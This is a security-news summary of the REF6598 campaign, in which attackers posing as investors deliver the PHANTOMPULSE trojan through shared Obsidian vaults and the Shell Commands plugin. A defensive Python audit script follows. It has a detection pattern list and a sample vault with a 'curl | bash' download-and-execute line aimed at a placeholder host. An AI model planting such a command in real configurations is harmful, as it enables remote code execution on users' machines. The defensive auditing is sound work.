Hackers Exploit Obsidian Plugin to Deploy Cross-Platform Malware
Severity: High (Score: 64.5)
Sources: Gbhackers, Cybersecuritynews
Summary
Threat actors are abusing the Obsidian Shell Commands plugin to deliver malware, specifically targeting professionals in the financial and cryptocurrency sectors. The campaign, tracked as REF6598, relies on social engineering: the attackers pose as a venture capital firm to engage victims, then move the conversation to Telegram. They use shared cloud vaults to deploy a malware chain that culminates in the PHANTOMPULSE remote access trojan. The method exploits no software vulnerability, which makes it particularly insidious: the plugin is doing exactly what it is designed to do. The attack is ongoing and focuses on individuals rather than organizations, raising the risk for the targeted people. Victims are manipulated through fake partnerships and group chats, complicating detection and response. The full scope of the impact remains unclear, but the targeting of high-value sectors suggests a significant risk. Security professionals are urged to be vigilant and to monitor for unusual communications.
Key Points
- Hackers abuse Obsidian's Shell Commands plugin to deliver malware without exploiting any vulnerability.
- The campaign targets individuals in the financial and cryptocurrency sectors using social engineering.
- Attackers deploy the PHANTOMPULSE trojan via shared cloud vaults and Telegram group chats.
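Because the delivery path is a shared vault whose plugin configuration runs commands, a defender's first check is to audit any vault received from outside before opening it in Obsidian. The script below is an added example, not code from the page, from the cited sources, or from the Obsidian or plugin authors. It assumes the Obsidian vault layout (enabled community plugins listed as a JSON array in `.obsidian/community-plugins.json`, per-plugin settings in `.obsidian/plugins/<id>/data.json`) and assumes the Shell Commands plugin uses the ID `obsidian-shellcommands`; the field names in the constructed sample `data.json` are illustrative, not the plugin's real schema, which is why the audit walks every string value rather than trusting a particular key.

```python
import json
import re
import tempfile
from pathlib import Path

# Assumed plugin ID for the Obsidian Shell Commands community plugin
# (not stated on the page; treat as an assumption).
SHELL_COMMANDS_PLUGIN_ID = "obsidian-shellcommands"

# Heuristics a defender might flag in a configured command string:
# download-and-run chains, encoded payloads, interpreter invocations.
SUSPICIOUS_PATTERNS = [
    re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr)\b", re.I),
    re.compile(r"\bbase64\b", re.I),
    re.compile(r"\b(bash|sh|zsh|powershell|pwsh|cmd(\.exe)?)\b\s+-", re.I),
    re.compile(r"\b(python3?|node|osascript)\b", re.I),
]


def _strings_in(obj):
    """Yield every string value nested anywhere in a parsed JSON document."""
    if isinstance(obj, str):
        yield obj
    elif isinstance(obj, dict):
        for v in obj.values():
            yield from _strings_in(v)
    elif isinstance(obj, list):
        for v in obj:
            yield from _strings_in(v)


def enabled_plugins(vault):
    """Return the enabled community plugin IDs for a vault.

    Assumption: Obsidian records them as a JSON array of IDs in
    .obsidian/community-plugins.json; a missing file means none enabled.
    """
    path = Path(vault) / ".obsidian" / "community-plugins.json"
    if not path.is_file():
        return []
    return [p for p in json.loads(path.read_text(encoding="utf-8")) if isinstance(p, str)]


def audit_vault(vault):
    """Audit a vault for Shell Commands plugin settings that look like malware delivery.

    Returns {"plugin_enabled": bool, "findings": [(string, pattern), ...]}.
    Walking all string values keeps the check independent of the plugin's schema.
    """
    result = {"plugin_enabled": False, "findings": []}
    if SHELL_COMMANDS_PLUGIN_ID not in enabled_plugins(vault):
        return result
    result["plugin_enabled"] = True
    data_file = Path(vault) / ".obsidian" / "plugins" / SHELL_COMMANDS_PLUGIN_ID / "data.json"
    if not data_file.is_file():
        return result
    for s in _strings_in(json.loads(data_file.read_text(encoding="utf-8"))):
        for pat in SUSPICIOUS_PATTERNS:
            if pat.search(s):
                result["findings"].append((s, pat.pattern))
                break
    return result


def build_sample_vault(root, enable_plugin=True):
    """Write a constructed (fake) vault used only for this demo."""
    obsidian = Path(root) / ".obsidian"
    plugin_dir = obsidian / "plugins" / SHELL_COMMANDS_PLUGIN_ID
    plugin_dir.mkdir(parents=True, exist_ok=True)
    plugins = ["some-other-plugin"] + ([SHELL_COMMANDS_PLUGIN_ID] if enable_plugin else [])
    (obsidian / "community-plugins.json").write_text(json.dumps(plugins), encoding="utf-8")
    # Constructed settings: one benign command and one download-and-execute chain.
    # Field names are illustrative, not the real plugin schema.
    (plugin_dir / "data.json").write_text(json.dumps({"shell_commands": [
        {"alias": "word count", "command": "wc -w {{file_path}}"},
        {"alias": "sync", "command": "curl -s https://example.invalid/x | bash"},
    ]}), encoding="utf-8")


def run_demo(enable_plugin=True):
    """Build the sample vault in a temp dir, audit it, and return the report."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_vault(tmp, enable_plugin)
        return audit_vault(tmp)


if __name__ == "__main__":
    report = run_demo()
    print("Shell Commands plugin enabled:", report["plugin_enabled"])
    for cmd, pat in report["findings"]:
        print(f"  FLAGGED: {cmd!r} (matched {pat})")
```

Run it against a real vault with `audit_vault("/path/to/vault")`; a vault that arrives from a stranger and already has this plugin enabled is itself the signal, whether or not any command string trips the heuristics.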
Key Entities
- Malware (attack_type)
- Trojan (attack_type)
- REF6598 (campaign)
- Financial (industry)
- PHANTOMPULSE (malware)
- T1059 - Command and Scripting Interpreter (mitre_attack)
- Obsidian (platform)
- Telegram (platform)
- Obsidian Shell Commands Plugin (tool)
- Shell Commands Plugin (tool)